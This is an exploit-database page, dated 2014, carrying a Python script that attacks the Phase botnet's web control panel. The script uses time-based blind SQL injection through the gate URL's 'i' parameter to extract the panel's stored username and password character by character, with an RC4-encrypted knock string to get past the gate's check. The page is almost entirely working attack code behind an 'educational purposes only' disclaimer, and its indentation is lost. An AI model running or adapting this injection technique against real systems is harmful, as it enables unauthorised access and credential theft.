Phase botnet blind sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2014-12-23 | Type : webapps | Platform : linux
This exploit / vulnerability Phase botnet blind sql injection is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

import requests
import time
import sys

wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification

PostData = ""

def rc4_crypt(data , key):
S = list(range(256))
j = 0
out = []

for i in range(256):
j = (j + S[i] + ord( key[i % len(key)] )) % 256
S[i] , S[j] = S[j] , S[i]

i = j = 0
for char in data:
i = ( i + 1 ) % 256
j = ( j + S[i] ) % 256
S[i] , S[j] = S[j] , S[i]
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
return ''.join(out)

def brute_length(url, id):
for i in range(0, 30):
Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
ConnectUrl = url + '?i=' + Injection

start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()

if((end - start) >= wait_delay):
return i

return 0

def brute_char(url, position, id):
sys.stdout.write(" ")
sys.stdout.flush()

for i in range(32, 127):
Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
ConnectUrl = url + '?i=' + Injection

sys.stdout.write("\b%c" % chr(i))
sys.stdout.flush()

start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()

if((end - start) >= wait_delay):
break

def brute_panel(url):
global KnockString, PostData

PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')

print"Username: ",;
sys.stdout.flush()
ulen = brute_length(url, 1)

for i in range(1, ulen+1):
brute_char(url, i, 1)

print"\nPassword: ",
sys.stdout.flush()
plen = brute_length(url, 2)

for i in range(1, plen+1):
brute_char(url, i, 2)
print""

if(len(sys.argv) >= 2):
brute_panel(sys.argv[1])
else:
print("enter panel gate url")